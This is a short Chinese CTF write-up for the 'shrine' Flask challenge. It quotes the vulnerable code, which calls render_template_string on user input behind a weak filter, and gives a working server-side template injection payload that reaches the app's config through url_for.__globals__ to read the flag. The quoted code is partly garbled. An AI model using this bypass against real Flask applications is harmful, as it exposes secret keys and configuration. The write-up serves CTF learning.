标签:run image detail http 方法 form ctf blog class
直接看题
进来给了个python代码
import flask
import os
app = flask.Flask(__name__)
app.config[‘FLAG‘] = os.environ.pop(‘FLAG‘)
@app.route(‘/‘)
def index():
return open(__file__).read()
@app.route(‘/shrine/‘)
def shrine(shrine):
def safe_jinja(s):
s = s.replace(‘(‘, ‘‘).replace(‘)‘, ‘‘)
blacklist = [‘config‘, ‘self‘]
return ‘‘.join([‘{{% set {}=None%}}‘.format(c) for c in blacklist]) + s return flask.render_template_string(safe_jinja(shrine))
if __name__ == ‘__main__‘: app.run(debug=True)
这里用到了render_template_string()
函数,应该是ssti漏洞,和这道题类似
限制:过滤了()
,和关键字config,self
目标:os.environ.pop(‘FLAG‘)
这几个过滤,我想不出有什么方法可以bypass,然后看了这篇write up
paylod:/shrine/{{ url_for.__globals__[‘current_app‘].config[‘FLAG‘]}}
payload可行,但是里面还是有config
关键字???
然后我去python运行了一下代码
恍然大悟,这里的python代码只过滤了()
后面的config
和self
是把对应变量设为了None
,使得不能直接访问config
和self
所以,使用其他不需要()
的方法访问到config
或者self
就可以了
中午吃完饭来总结一下SSTI
标签:run image detail http 方法 form ctf blog class
原文地址:https://www.cnblogs.com/R3col/p/12718993.html